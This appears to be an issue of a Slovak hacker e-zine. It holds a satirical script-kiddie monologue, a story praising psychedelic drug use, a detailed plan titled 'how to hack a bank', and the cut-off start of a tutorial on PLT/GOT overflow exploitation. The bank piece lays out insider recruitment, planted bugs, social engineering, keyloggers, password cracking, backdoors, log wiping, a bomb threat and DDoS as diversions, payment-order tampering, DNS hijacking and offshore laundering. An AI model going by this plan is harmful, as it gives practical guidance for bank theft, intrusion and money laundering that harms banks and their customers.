viete, no, hekovat som zacal, ked som mal 14. teras mam 15 a som uz velmi dobri
heker. pracujem na pocitaci s windows 98, ktore som sy aj sam nainstaloval. moj
pocitac je pentium 5 1200mhz, mam 512 mb ram a velki disk. mam cd-romku,
napalovacku a vsetko co existuje. rat sa hram hri a mynule som na internete
nasiel cheaet na quake a hekol som tu hru. viem si teraz sam pridat zivoti aj
zbrane a vsecko co chcem.


mam sa rad. ale este radsej mam kevina mytnicka. ten bol vazne dobry. viete, raz
chcem byt ako kevin. aj preto uz mam precytane vsetky navody co som nasiel na
internete (v altaviste). cital som how to hack unix od c00lhacka, tiez som cital
hacking linux - 10 dobrych rad, od fuckin' radical byte rippera a tiez som cital
how to hack government computers od frozen hack kinga. ako vydite, som dobri.


moje oblubene hekerske nastroje pod windows su winnuke (ten je vazne dobri),
potom black orifice (hahaha, mynule som ho poslal mame do roboti a vymazal som
jej cely disk!) a potom este aj unabomber (to je taki program, co s nim niekomu
mozte poslat aj tisyc mailov a mozte si vybrat z akej adresy mu to pride a on
vas potom nema ako zystit!!!).


strasne by som chcel heknut stranku nasej skoly. skola sucks, sucks, sucks,
sucks!!! dobre ma nasrala dneska triedna, lebo ma vyvolala zo slovenciny. tak
heknem skolsku stranku a napysem tam, ze je krava!!! uz viem ako sa vola ten
hlavni subor co treba heknut - "index.html". neviete niekto ako zistim nejaku
"ip adress"? zevraj ked to zystite, tak potom uz je to lachke heknut. (to pysali
v hacking manual-e od knight-a deadly-ho). inac, zakladam hekersku skupynu,
budeme sa volat killing bastarts, takze ak niekto chcete sa prydat a ste naozaj
dobri heker, tak mi napyste na tento e-mail: peter_ondruscak@kancelaria.potraviny-u-kamila.sk


to je email mojho oca, takze tam ako mate ze: "subject:" napiste "pre jozefa"
a on mi to vytlaci a donesie. ja nemam internet doma a chodim k nemu do prace.
inac, ked niekdo viete ako si hacknut emailovu adresu na hotmeily, tak mi
povecte, lebo zevraj to je lachke.


no, tak este vam poviem nieco o sebe. pocuvam hlavne tvrdu muziku - rammstein
a metallicu, ale dobra je aj elektronycka hudba ako aqua a eiffel 65. mam jednu
sestru, ale ona je krava - ma 20 rokov a furt sa zatvara do izbi so svojym
frajerom. a ten je ties blbec, lebo vobec nevie robyt s windows a stale nieco
trepe o aix a neviem co este. z jedla mam rad pizzu a na pytie cocacolu. (to aj
kevin mytnick mal rad!!!!) z hier mam rad quake a formule. a este mam rad
heking, ckraking a freking.


tak a to je vsetko. aha, vlastne hack da planeeeeeeeeeeeeeeeeet!!!!!!!


fez0j da hacka
(to fez0j je akoze moje meno odzadu, to som sam vimislel)



p.s. - podobnost s realnymi osobami, miestami, potravinami a operacnymi
systemami je cisto nahodna. ak si myslite, ze takito hackeri su napriklad
ten, tamten, alebo ini, tak to nie, to vobec neni pravda. ne, vazne. vazne!
heh.



cut&paste z realneho zivota vykonal niko, niko(at)hysteria.sk



navrat na obsah




kybersaman [dokoncenie]


bonnard bol celozivotnym studentom. ucil sa od svojho okolia, z knih, od ludi,
ktorych stretaval len tak na ulici, od svojich mileniek a na svojich chybach.
zaujimal sa o biologiu, chemiu, fyziku, etnobotaniku, matematiku a samozrejme
- o kybernetiku. cital diela davnych i nedavnych filozofov. ako povedal lama
govinda: "veda a filozofia su len dve odvetvia tej istej posvatnej discipliny.
v staroveku sa povazovalo za uplne samozrejme, ze velky ucenec bol aj svatym
muzom s hlbokou znalostou sameho seba". bonnard prisiel na to, ze svet je
postaveny z bitov. bity sa skladaju z nul a jednotiek - casti, ktore si
odporuju, no v tomto rozpolteni ho vlastne vytvaraju. a preto vedel, ze veda bez
vnutornej filozofie a vnutorna filozofia bez vedy moze stvorit len katastrofu.
ale ked ma niekto vedomosti aj mudrost, moze ho to zachranit pred takymi vecami
ako vyrobenie atomovej bomby. (keby tak jej vynalezcovia poznali samych seba!).


vnutorna filozofia sa da najlahsie dosiahnut kombinaciou psychedelickych drog
a starych uceni - to vedel. amazonska ayahuasca, indicky bhang, himalajsky caras,
norske muchotravky, mexicke lysohlavky. europsky alkohol sem akosi nezapada, ved
ako jediny vedomie nerozsiruje, naopak, obedzuje ho. bonnard vsak nevedel, ci
psychedelicke drogy su ten spravny sposob, ved existuje joga a meditacia. bral
to ako fakt, pretoze s nimi uz zacal. ostatne sposoby vsak vobec nepodcenoval.


vedomosti mohol ziskat v skole. tieto vedomosti mu vsak boli uplne nanic. uz len
z toho dovodu, ze o ne nemal zaujem. skola bola prenho len dalsia primitivna
push-technology. ako rozhlas a televizia. existovalo vsak moderne medium -
kyberpriestor... internet... miesto, kde sa obrovska neuronova siet ludi
rozhodovala, ku ktoremu nazoru (vyplodu neuronu) sa pripojit. internet uplne
popieral psychologiu. psychologia davu hovori, ze akykolvek dav je hlupejsi ako
priemerny jednotlivec. statisice open-sourcovych kyberpunkerov to popieralo.
vytvarali dielo, ktore nedokaze vytvorit ziadny jednotlivec osamote. internet
bol zdrojom informacii, navodom na riesenie problemu a samozrejme - neuronovou
sietou. mozno ludia na internete su spojeni priamo - neuronova siet s neuronovou
sietou. mozno ti kyberpunkeri uz vobec nepotrebuju klavesnicu, mys a monitor.
mozno vidia len to, co je za tymito "kraksnami" - neurony a data.


toto vsetko vedelo pred nim mnozstvo ludi. existovalo mnozstvo filozofov, ktori
poznali svoje vnutro viac ako cokolvek ine. existovalo mnozstvo vedcov, ktori
mali uzasne znalosti z roznych vednych disciplin. ale jedno este neskusal nikto.
nikto v tejto dobe. spojit vedca s myslitelom. a to bolo presne to, co spravil
bonnard na zaciatku nasho pribehu. chcel byt vedcom a myslitelom zaroven, aby
tak mohol poznat seba. cez seba mohol spoznat svet. a ked poznal svet a seba,
mohol pomahat inym. stal sa z neho levitujuci tibetsky mnich sediaci na zemi.
stal sa obrodou svatca v civilizovanom svete. bonnard slovo civilizovany bral
ako zivy priklad duality. civilizovany je priam nadavka. ked sa cez mreze, do
ktorych nas uvrhol svet za kurenie travy, pozerame na to, ako notoricki
alkoholici obcuravaju podchod. za prirodu a rozsirenie vedomia dostanete mreze!
za chemiu a obmedzenie vedomia dostanete tak maximalne tvrdu pecen. na druhej
strane slovo civilizovany znamena, ze uz nemusite stravit niekolko rokov na
lodi, aby ste sa dostali tam, kam sa dostat chcete. civilizacia znamena vedu
(cize vnutorne naplnenie), pricom absolutne odrieka duchovnu filozofiu, cize
sposobuje vnutorne prazdno.


nejakym zahadnym sposobom - pod vplyvom psychedelik - prisiel v kyberii na to,
ze svet duchovna a realisticky svet vytvaraju realitu. ved co ine bol pre neho
svet ako to, co vnimal vlastnym vedomim ? zmenou vedomia ziskal odlisny -
rozsireny a dualitny - pohlad na svet okolo neho. a prisun sveta, prisun dat,
informacii na spracovavanie, jedlo pre jeho neuronovu siet, to vsetko
zabezpecoval internet. maly opticky kabel.


"drogy su svinstvo!" - tvrdili mu intelektuali.

"kup si mobil a si s nimi!" - hovorili fetaci.


bonnard bol vsak iny ako ostatni. vedel, ze ked oboje vyuzije vo svoj prospech,
moze len ziskat. jeho vnutro sa naplni a navonok z neho bude vyzarovat klud.
bude sam. uplne sam. bude mat rad, ale nebude milovany. bude pomahat, no nikto
mu uz nepomoze.


stal sa z neho svatec, ktory prepadol diablovi. stal sa z neho fetak-vedec,
narkoman-intelektual. stal sa z neho... kybersaman.




nicotine, nicotine(at)hysteria.sk


navrat na obsah




ako hacknut banku


elektronicky vykradnut banku nie je zrovna lahke, ale nie je to ani take
tazke, ako by si ludia (rozumej poulicna zmes) mysleli. takze podme na to.


prvy krok: priprava


najprv si dame dokopy team ludi. budeme potrebovat tak aspon sest
softverovych vyvojarov na hackovanie, idealne, aby medzi nimi bol
specialista na as/400, sun solaris, unix vseobecne, digital vms, ibm vms,
windoze 95/98/nt no a na bankovy aplikacny software a komunikacne
protokoly. budeme tiez potrebovat jedneho cloveka v banke. staci ak to
bude clovek na strednej urovni, asistent manazera, cloviecik pri
prepazke, klepica co nahadzuje udaje do pocitaca, take nieco. kedze
slovenske banky teraz prijimaju relativne dost ludi a otvaraju nove pobocky
kade-tade, pre schopneho cloveka nie je problem najst si v banke robotu
niekde na strednej priecke rebrika hierarchie. jo a skoro by som zabudol
- potrebujeme niekoho sikovneho do fyzickej bezpecnosti a tiez nejakeho
vhodneho "socialneho inziniera", proste niekoho s vrtkym jazykom a silnym
sarmom :)


ok, teraz si vyberieme ciel nasho utoku. nebolo by dobre vybrat si
slovensku pobocku velkej zahranicnej banky - lebo ta bude dobre
zabezpecena. vo vseobecnosti nie je vhodna ziadna velka banka. mala
lokalna banka tiez nie je dobra, lebo by si velmi rychlo vsimli
poletovanie milionov korun von ich elektronickymi dvermi. idealna je teda
banka strednej velkosti so slovenskym IT manazmentom.


ako pri kazdom dobrom podnikatelskom plane, budeme potrebovat nejake
pociatocne investicie na masiny, pocitace, nastroje, zivobytie, uplatky,
atd. pre zaciatok by sme mohli vystacit s 2-3 milionmi korun. nasim cielom
je ukradnut z banky 100-200 milionov.


druhy krok: nabeh


nas clovek na fyzicku bezpecnost sa zamestna vo vybranej banke ako
elektrikar, udrzbar, alebo podobne. nasi hackeri dostanu za ulohu
skonstruovat jednoduche plostice (napr. podla navodu z phracku), tieto
nas clovek na fyzicku bezpecnost rozmiestni po banke na vhodnych
miestach. banky na slovensku nemonitoruju elektromagneticke spektrum a
nie su schopne najst plostice. vo vecernych hodinach pod zamienkou udrzby
sa nas "udrzbar" trosku pohrabe v kancelariach, pisacich stoloch a
skriniach. ziska prevadzkove predpisy, popis pocitacovej siete, fyzicky
si omrkne zapojenia v serverovni, atd. v tom istom case sa nas socialny
inzinier pokusi zistit maximalne mnozstvo informacii o tom ako banka
otvara, modifikuje a vyplaca svoje ucty. moze sa tvarit ako seriozny
business zakaznik, alebo napriklad ako obchodnik - dodavatel vypoctovej
techniky. moze sa skamaratit so zamestnancom banky, alebo nabalit
riaditelovu sekretarku. ked vie, ze v banke maju napriklad server as/400,
nas hacker moze zavolat do banky, tvarit ako novy servisny technik IBM a
pozistovat si informacie o hardverovej a sofverovej konfiguracii ich
servera. pokial clovek ovlada ten spravny dialekt a ma potrebne know-how,
nie je problem pozovat ako technik zahranicnej dodavatelskej firmy. no a
samozrejme nas hlavny insider zamestnany na strednej urovni bude ziskavat
maximum informacii o bankovej sieti, softveri, pracovnych postupoch a
zamestnancoch.


po par tyzdnoch by sme mali byt totalne v obraze. mame spisany vsetok
inventar suvisiaci s vypoctovou technikou a pozname postupy pri
platobnych prikazoch. je cas zacat trosku hackovat. s hackovanim zacneme
spociatku velmi opatrne. zatial sa budeme drzat prec od systemov, ktore sa
staraju o medzi-uctove a medzi-bankove operacie. skusime stary dobry
war-dialing a skusime napriklad najst nejaky modem, ktory je zaveseny na
telefonnej linke a odpoveda na zavolanie. v tomto stadiu je dobre zalozit
si ucet a spravit si na nom internet banking. skusime zistit, ci manazeri
ktori cestuju s notebookmi, nemaju spraveny dial-up do banky, alebo ci
niektory z dodavatelov hardveru banke nema spraveny remote monitoring cez
modem.


akokolvek sa dostaneme dnu, v kazdom pripade budeme k tomu potrebovat
zopar hesiel zamestnancov. tie ziskame lahko. nasi hackeri maju totiz v
tejto oblasti bohate skusenosti z napadania internetovskych serverov (viz
http://hysteria.sk/hacked/). nas insider z diskety nabehne na pc-kach
programy, ktore budu zachytavat stlacene klavesy. nabehneme back oriffice,
sniffery, budeme crackovat passwd fajly rozsiahlymi wordlistmi. ked prednedavnom
skupina binary division crackla nejakych 15 tisic hesiel z home.sk, pre nas predsa
nebude problem obdobne si zaobstarat aspon za tucet hesiel.. niektore
hesla uhadnu nasi socialni inzinieri, niektore mozno najdeme napisane v
poznamkovych blokoch, osobne som videl rootovske heslo napisane na
post-it papieriku a nalepene priamo na serveri v serverovej miestnosti
istej nemenovanej institucie, aby si ho administrator nemusel pamatat.
budeme sledovat zamestnancov a zistime ci maju konta na serveroch mimo
banky. ak maju konta na freemailoch (hotmail.com, post.sk, pobox.sk,
atd.) alebo hocikde na internete, crackneme alebo sniffneme ich heslo a
mame sancu, ze heslo vo vnutri v banke je take iste.


treti krok: programovanie


ked uz sme sa dostali do par masin na vnutornej bankovej sieti, snazime
sa sniffovanim a crackovanim hesiel dostat na co najviac systemov. aj ked
vonku v internete je bezne pouzivat sifrovane komunikacne protokoly ako
ssh, vo vnutropodnikovych sietiach je bezny telnet alebo rlogin a tie
mozeme v pohode sniffovat. vo vseobecnosti plati, ze servery vystavene na
internet su neustale vystavene scanovaniu hackermi, preto ich organizacie
pravidelne patchuju a kontroluju. na vnutropodnikove masiny za firewallmi
sa vsak vacsinou z pohladu security serie. ked ziskame uzivatelsky
pristup na unixovych serveroch, je lahke ziskat roota - lebo
vnutropodnikovy server malokto patchuje koli bezpecnosti. na komercne
unixy existuje take mnozstvo exploitov, ze ak napriklad natrafime na rok
staru instalaciu solarisu 7 bez security patchov, mozeme si vybrat
minimalne z poltucta exploitov...


ked uz mame zopar root kont, vytiahneme zbrane vacsieho kalibru.
nainstalujeme backdoory, trojske kone, vytvorime si vlastne konta.
nabehneme sniffre a monitorujeme vsetok traffic na sieti. naburame sa do
archivu e-mailov a pocitame si postu vyznamnych ludi. takto sa naucime
mechanizmus, akym sa v banke pohybuju peniaze, naucime sa nazvoslovie,
slangove vyrazy, skratky a terminologiu.. stiahneme si passwd fajly a
nabehneme crackery hesiel. kedze uz mame na masinach rootov a vieme mazat
logy, nabehneme network analyzery ako su nmap, satan, iss a podobne a
skanujeme siet na otvorene porty, sluzby a masiny. vzniknute logy mazeme
"cisticmi".


sucasne zacne boj na aplikacnom fronte. ziskame kopie softverovych
aplikacii, ktore banka pouziva na manazment penazi a uctov, pretoze chceme
tento softver potajme modifikovat a nasadit. pokusime sa ziskat zdrojaky
tychto programov. idealne by bolo dostat sa k zdrojakom cgi scriptov,
ktore obsluhuju internet banking a spravit si v nich backdoor. pokial sa
k zdrojakom nedostaneme, skusime dissasemblovat aplikaciu crackermi a
upravit si ju po svojom. neskor sa pokusime nahradit aplikacie nasimi
prerobenymi verziami.


skor ci neskor budeme presne vediet ako sa interne presuvaju peniaze
medzi uctami na urovni bezneho pracovnika a ako tieto presuny
kontrolovat. budeme vediet ake druhy bezpecnostnych kontrol a verifikacii
sa robia pre dany typ a velkost transakcie, kedy sa vykonavaju audity,
ako je nastavena ochrana pocitacovych systemov a ako ich monitoruju
spravci systemov. ale stale si nezoberieme ziadne peniaze.


kym ziskavame informacie o vnutornom fungovani banky, budeme tiez
ziskavat informacie o najnovsich hackerware-virusoch, autospameroch,
distribuovanych denial-of-service utokoch a podobnych lahodkach. hackneme
si servre po svete ako vhodne gateway masiny na spustenie takychto
utokov, ale zatial nic neaktivujeme.


nakoniec si cez web a pomocou anonymizerov a redirektorov zalozime ucty v
bankach na jamaike, cypre, bahamskych ostrovoch a v dalsich krajinach,
ktore poskytuju maximalne mnozstvo sukromia a minimalne kooperuju s
medzinarodnymi policajnymi a vysetrovatelskymi organmi. zalozime si tiez
konta v slovenskych bankach pomocou "bielych konov" a nastavime si v nich
internet banking tak, aby sme okamzite mohli cez internet posuvat velke
financne ciastky.


stvrty krok: kradez


nas uder si naplanujeme na jeden zo zhruba osmich rocnych obdobi so
zvysenou bankovou aktivitou, napriklad pred vianocami. najprv aktivujeme
denial of service utoky a pocitacove virusy. toto je ekvivalent dymovnice
a granatov so slznym plynom v civilnom svete - proste spravime trosku
chaos/bordel/paniku. pripadne pridame aj nejaky vyhrazny telefonat o tom,
ze na pobocke je umiestnena bomba, zapchame odtokove potrubia
kanalizacie, sposobime nejaky ten elektricky skrat, postriekame stenu
peknym grafiti napisom a tak. nasledne budu vsetci zamestnanci
vypoctoveho strediska banky skakat tri metre bez odrazu a sialene
monitorovat vsetky systemy, sledovat logy a tak.. samozrejme ze banka by
mohla predist serioznym skodam tak, ze zavrie vsetky pobocky dokial
vsetko nebude pod kontrolou. ale nespravi to, pretoze banka musi mat vzdy
imidz dokonalej spolahlivosti a fungovat 24 hodin denne.


.. ale toto vsetko je samozrejme iba na odvratenie pozornosti nepriatela..


hlavny utok pride na troch frontoch. najprv pretransferujeme peniaze zo
stoviek uctov na tie. ktore sme si otvorili. spravime to bud cez hacknute
konta operatorov, alebo pomocou hacknutej verzie softveru na manazment
uctov, alebo aj aj. z kazdeho uctu zoberieme len skromny obnos, taky aby
bol menej ako hodnota, ktora je nastavena na spustenie vyssieho stupna
bezpecnosti - moze to byt trebars prevod nad 50 000,- Sk, alebo 10% celej
hodnoty uctu, alebo oboje. v tomto obdobi roka sa to bude javit ako bezny
pohyb medzi uctami, nikto si to nevsimne ako zvysenu aktivitu pohybov
medzi uctami. teda mozno za normalnych okolnosti by si to vsimli technici
vypoctoveho strediska, ale teraz vsetci manazeri a technici banky sialene
pobehuju a maju co robit vysporiadat sa s panikou ktoru sme sposobili.
ked sa zacnu peniaze kumulovat na nasich uctoch, postupne ich
transferujeme von do nasich vonkajsich uctov, zase len v malych
ciastkach.


druhy frontalny utok bude zachytavanie skutocnych platobnych prikazov
medzi bankami. inak povedane - budeme zachytavat prevodne prikazy
legitimnych klientov nasej banky na ucty na cudzie banky. je extremne
tazke vytvorit falosny prevodny prikaz, pretoze vsetky platobne prikazy s
vyssou sumou (dajme tomu nad 100 000,- Sk) musia mat fyzicke povolenie od
najmenej dvoch manazerov banky. nedokazeme zachytit transfery medzi
bankami, pretoze cestuju zakryptovane. takze musime prevodny prikaz
zachytit po tom ako ho potvrdia podpisom manazeri v banke, ale pred tym
ako sa zasifruje. tento typ utoku sa vola man-in-the-middle utok a v
dnesnej dobe nie je na internete vobec neobvyklym javom. jednoduchym
prikladom z internetovskeho sveta je hacknuta binarka ssh klienta, ktora
zachyti a zapise heslo po tom ako ho uzivatel naklepe z klavesnice, ale
pred tym ako sa zasifruje a posle po sieti. ked sa elektronicke
potvrdenie platobneho prikazu presunie po lokalnej sieti banky - dostane
sa na server ktory de facto kontrolujeme, aby sa tam zasifroval. podobne
ako na uvedenom priklade s ssh staci modifikovat program ktory prijme na
serveri informaciu a zasifruje ju tak, aby ju este pred tym modifikoval a
zmenil prijemcu platobneho prikazu na niektory z nasich uctov. pokial v
istej faze prenosu ide po lokalnej pocitacovej sieti informacia o
potvrdeni platobneho prikazu, existuju aj utilitky ktore ho dokazu
"zabehu" modifikovat z masiny na tom istom segmente a netreba mat k tomu
kontrolu nad cielovou masinou.


treti frontalny utok pojde na server internet bankingu. ak na nom mame
roota, tak voila, pouzijeme podobny postup ako pri modifikacii platobnych
prikazov cestujucich po lokalnej sieti. ak nemame roota, mozeme pouzit
menej elegantny, ale predsa ucinny sposob. staci ak zmenime IP adresu v
internetovskom DNS zazname na dany server a presmerujeme WWW traffic na
nejaky nas hacknuty server. tuto metodu nedavno preslavil hack
www.hzds.sk, vsakze. vacsina slovenskych bank ma primarny DNS server u
svojho internet providera, a ti maju svoje masiny povacsine derave ako
emental - takze by to mala byt prudka pohoda. na novej IP adrese
nabehneme program, ktory si pokeca SSL s klientom, zapise si alebo
zmodifikuje prijate data o prevode, a vysledok posle skutocnemu
internet-banking serveru. jasne ze webovsky browser si popinda na to, ze
sa zmenil SSL verifikacny kluc. ale drviva vacsina uzivatelov klikne "OK,
accept" na nas novy kluc. ved poznate poulicnu zmes :)


peniaze, ktore miznu z napadnutej banky sa zbiehaju na niekolkych uctoch
inych slovenskych bank. okamzite posleme predpriravene prevodne prikazy
na banky do zahranicia. postupne skonsolidujeme vsetky peniaze na
niekolkych off-shore uctoch. mnohe off-shore banky poskytuju internet
banking, alebo aspon ovladanie cez modem. preto okamzite presuvame
peniaze z jedneho off-shore uctu na druhy a nakoniec v poslednej banke
nam ich biely kon vyzdvihne v hotovosti.


potom sa vyparime zo sceny na novom sportaku s V8 motorom. kupime si vilu
na grenade a pozveme iva lexu na afterparty.


utopia ?


myslite si, ze je to len utopia? vacsina computer-security expertov vam
potvrdi, ze hore popisany scenar je realizovatelny. na slovensku urcite.
ale kludne aj inde. v roku 1994 stiahol z citibanky 24-rocny hacker
vladimir levin z petrohradu 10 milionov dolarov. neskor ho chytili,
odovzdali do spojenych statov a bol odsudeny na tri roky nepodmienecne.
(az na 400 000 dolarov sa vsetky peniaze nasli.) taketo nieco sa deje
dost casto, ale zvycajne to neprenikne na verejnost - tvrdi michael
higgins - byvaly analytik informacnej agentury ministerstva obrany
spojenych statov. v usa pozaduje federalna vlada od bank aby reportovali
vsetky straty. higgins ale tvrdi, ze koli zlej publicite reportuju banky
skody vzniknute hackermi ako inak vzniknute skody. castokrat banka vobec
nekontaktuje policiu, lebo sa boji ze keby prenikli na verejnost spravy o
tom ze banka je hacknutelna, ludia by si z nej hystericky zacali vyberat
peniaze a sli by ku konkurencii. niektore zdroje z prostredia
financnictva v USA reportuju jednotlive pripady kde skoda presiahla sumu
100 milionov americkych dolarov.


pokial sa vyssie popisane scenerio hacknutia banky uz neodohralo aj v
nasich zemepisnych sirkach, coskoro sa odohra. taketo nieco zvladne totiz
len naozaj dobry programator, znalec pocitacov a hacker. taky, ktory by
na zapade vobec nemusel hackovat, lebo by mal dobre plateny job v
prekvitajucom IT priemysle. to vsak u nas neplati - dobre platenych jobov
v IT brandzi je malo, vlastne su len v slovenskych pobockach zahranicnych
IT firiem. ale aj v tych su prijmy vo vyske zlomkov zahranicnych prijmov.
navyse sa jedna povacsine len o povysunute marketingove kancelarie v
ktorych absentuju zaujimave a kreativne IT joby - tie sa koncentruju v
materskej krajine danej IT firmy.


aj ked nasa kradez by bolo elektronicka, pravdepodobne by bola nemozna
bez informacii zvnutra banky. Levin mal pri jeho kradezi partnera vo
vnutri banky. human resources manageri v slovenskych bankach nerobia
ziadne lustracie kandidatov o joby vo vnutri banky.. az na obligatny
vypis z registra trestov. hihi, neda mi v tejto chvili nepovedat, ze na
slovensku ich maju zatial vsetci hackeri cisty.


najlepsim tercom su banky strednej velkosti ktore sa agresivne vrhli na
informacne technologie a internetovy/gsm/tele banking, pretoze citia tlak
od technologicky-zalozenych velkych bank. toto ich prinutilo vletiet
strmhlav do sveta informacnych technologii bez toho, aby na to mali naozaj
potrebnu expertizu a znalosti, cim sami vytvaraju diery v bezpecnosti.
ktora zo slovenskych bank, ktore nedavno vypustili internetovy banking
naozaj do hlbky rozumie vsetkym technologiam suvisiacim s manazmentom
citlivych informacii v prostredi internetu ?


vsetky slovenske banky si nainstalovali nejaky ten mix hardverovych a
softverovych firewallov, ktore sedia medzi divokym slovenskym internetom a
ich hlavnym vstupom do internej siete. kto im ich vsak dodal? na
slovensku neexistuje poriadna firma so zameranim na computer security.
ano, je tu niekolko dilerov firewallov, ale to su suchi obchodnici. no a
samozrejme kazdy zo systemovych integratorov posobiacich na nasom trhu
tvrdi ze robi "aj" security, nemaju vsak na to dedikovany seriozny team
odbornikov. prave tieto velke IT firmy, ktore maju v lukrativnom bankovom
businesse najvacsi podiel na dodavkach, realizovali vacsinu security
rieseni v slovenskych firmach. ten kto cosi vie o tom ako u nas
prebiehaju vyberove konania na dodavky v oblasti IT, vie, ze technicka
uroven ponukanych rieseni je v podstate irelevantna. vyhravaju kontakty a
bocne prachy, vsakze.


a co nase skolstvo? pripravuju nase univerzity mladych profesionalov na
moderne bezpecnostne riesenia? hihi, no podme radsej dalej.


v podstate aj tak mozeme zabudnut na kvalitu firewallov. niektore su
dobre, ine su slabe. ale hackeri vzdy hladaju male dierky v systeme,
zadne vratka. netreba buchat baranidlom do hlavnej brany, ked staci rozbit
okienko na kupelni a vliezt dnu. plati zname klise, ze retaz je len tak
silna, ako je silny jej najslabsi clanok. a mimochodom, slovenski dileri
krabic so security softwarom zacali ponukat aj sofistikovany (rozumej
drahy) intrusion detection softver. tento komplexny softik sa snazi
rozpoznat hackersky traffic od bezneho trafficu. velmi narocna uloha,
ktoru ale sikovny hacker zvladne obist. ista security firma zo seattlu
ktora robi penetracne testy bankam napisala ze zo styridsiatich pokusnych
testov zareagovali intrusion detection systemy len raz.


servery, ktore obsluhuju internet banking, by mali by fyzicky oddelene od
internej siete banky. kaslime na programatorov, nic nie je bezpecnejsie
ako ked je internetovy server banky totalne fyzicky mimo a nevedie z neho
ani jeden kabel do internej siete. dnes vsak tuto logicku strategiu
narusuje moderny marketingovy trend. centralizacia! klienty sa stensuju
a servre sa konsoliduju do mamutich multi-domenovych strojov. ak je
internet banking na jednej domene multi-domenoveho servera a na dalsich
domenach su senzitivne data, bezpecnost visi na sikovnosti programatorov
operacneho systemu (zatial to vo svete unixu robi len sun a compaq). a na
milosti Vsemohuceho, lebo ak chcete volaco vediet o bezpecnosti
operacnych systemov spominanych vyrobcov, natukajte si vhodne slovicka do
searchenginu na packet-storm security sajte. uvidite desiatky
reportovanych bezpecnostnych bugov a exploitov na ne len za posledny
rok-dva.


jeden zakladny problem na slovensku v oblasti compsecurity suvisi s faktom,
ze bezpecnost pocitacovych systemov su preteky s casom. aj ten
najbozskejsi bezpecnostny system sa moze ukazat zranitelny vdaka
novoobjavenej security vulnerabilite. nedavna hysteria session 2000 v
piestanoch ma presvedcila o jednej veci - na slovensku je zdrava komunita
hackerov, ktori spolu velmi efektivne komunikuju a technicke novinky sa
medzi nimi siria rychlostou motoroveho prasata. a sprav je dnes veru
neurekom. statistika hovori, ze kazdy treti den sa objavi novy security
bug vo Windowse NT. ked hovorim o potrebe byt neustale up-to-date,
nepoukazujem len na povahovy rozdiel hackera prahnuceho po informaciach
od znudeneho admina s na_setko_serem strategiou. stale totiz existuje
principialny rozdiel medzi ochotou zdielat security informacie v tychto
dvoch rozdielnych svetoch. kym hacker nadsene zdiela svoju informaciu s
internetovou komunitou, komercna firma, ak aj nieco najde si to radsej
necha pre seba. internet security je boj o to, kto je informovanejsi a u
nas su na cele peletonu hackeri s dalekym naskokom pred hlavnou skupinou
cyklistov. vacsina adminov odstupila z pretekov pred prvym stupakom a
popijaju v bufete.


prenosy dat medzi bankami su sifrovane a je nepravdepodobne, ze by sa nam
podarilo zlomit sifru ktoru pouzivaju. nie, ze by to bolo nemozne.
dejiny su plne pripadov kedy sa prelomila "neprelomitelna sifra".
spytajte sa vyrobcov mobilnych telefonov, medialnych firiem ktore
vyrabaju DVD, alebo hocijaka firma, ktora pouzivala DES enkrypciu. Vacsina
bank v dnesnej dobe pouziva triple-DES, na prelomenie ktorej, by udajne
bolo treba "mimozemsku technologiu". my ale nepotrebuje crackovat
triple-DES. dokazeme zistit heslo zamestnanca, alebo zachytit informaciu
pred tym ako sa zasifruje.


v anglicku sa napriklad stal pripad, ze pracovnicka banky zistila, ze
zmena adresy majitela uctu sa nikam nezaznamenava. takze si zmenila
adresy niekolkych klientov banky na svoju vlastnu adresu kratko pred
koncom mesiaca, dostala postou ich seky, a potom adresy zmenila naspat.
robila to pocas desiatich rokov, potom ju chytili.


dokaze sa banka ochranit proti distribuovanemu DoS utoku cez internet ?
nie. a nech vas nemyli fakt, ze sa v cechach alebo na slovensku este
nezaznamenal rozsiahly utok podobny nedavnym utokom v USA na yahoo.com a
dalsie sajty. programy ako "extended trinu" sa daju stiahnut vselikde a
na ich spustenie je akurat treba mat podchytenych desiatky alebo stovky
masin. v usa takymto utokom vyrazne pomohli domaci uzivatelia na rychlych
pevnych linkach (cez kablovu televiziu a pod.) so zle zabezpecenymi
PCkami. to nas este len caka - UPC ohlasila start internetu cez kablovku
v centre Bratislavy na jar buduceho roku. okamzite budu pribudat stovky
vhodnych kandidatov na "otrokov" distribuovanych utokov - rychla linka a
zle zabezpecene PCko (rozumej - defaultne nainstalovane windowsy)


ak - alebo, povedzme si uprimne - ked sa na slovensku stane prvy velky
hack banky, o ktorom sa bude verejne vediet, vacsina ostatnych bank
pravdepodobne zvysi uroven zabezpecenia tak, ze asi nebude mat zmysel ist
po nich. alebo aspon nie dovtedy, kym je na internete tolko dalsich
prachatych firiem s ovela mensim zabezpecenim, ktore ponukaju drahy tovar,
zaujimave data, cisla kreditiek, platby za fiktivne sluzby, a tak dalej.


z pohladu hackera chvalabohu je iba malo IT firiem, ktore si bezpecnost
kladu ako jeden z najhlavnejsich kriterii pri tvorbe softveru. takze
aspon v dohladnej buducnosti sa bude nachadzat stale dostatok
bezpecnostnych dier. preto ked si oddychneme na vile v grenade a vratime
sa o nejaky ten rok na slovensko aby sme zase zarobili hackovanim, opat
sa skvele namastime.




pajkus
..s pouzitim vselijakych zdrojov..




navrat na obsah




exploitovanie cez plt (procedure linkage table) a got (global offset table)


Ciel


Objasnit mozne sposoby exploitovania nezasobnikovych overflowov (systemy
chranene StackGuardom, StackShieldom, non-executable stackom).


StackGuard


Klasicky exploit je postaveny na modifikovani navratovej adresy prepisanim
lokalnych premennych, alebo bufra. Vedlajsi efekt takehoto typickeho
zasobnikoveho overflowu je, ze znicime/modifikujeme vsetky data na zasobniku
od prepisovaneho bufra az po navratovu adresu. Viacmenej nas to nemusi
trapit, vzhladom k tomu, ze spustenie shellcodu (nejaky ten setuid, exec
syscall) nevyzaduje pritomnost tychto dat. Problem by mohol nastat v pripade,
ze modifikujeme navratovu adresu za adresu glibc funkcie (strcpy, system,
exec), kedy je nevyhnutne, aby sa tato funkcia zavolala s presne nastavenymi
hodnotami vstupnych argumentov (bud v registroch, alebo v zasobniku) a
neposkodenym EBP.
Princip StackGuardu je jednoduchy. Uklada sa "canary" slovo hned vedla
navratovej adresy v zasobniku. Ked je hodnota "canary" slova po navrate
z funkcie zmenena, zaznamena sa pokus o overflowovanie zasobnika, program
zaloguje vystrahu o danej snahe do syslogu a skonci.


Zasobnik vyzera asi takto :

	...				    ...
|-----------------------------------|
| parametre predavane funkcii |
|-----------------------------------|
| navratova adresa funkcie (RET) |
|-----------------------------------|
| "canary" slovo |
|-----------------------------------|
| lokalny frame pointer (%ebp) |
|-----------------------------------|
| lokalne premenne |
|-----------------------------------|
... ...

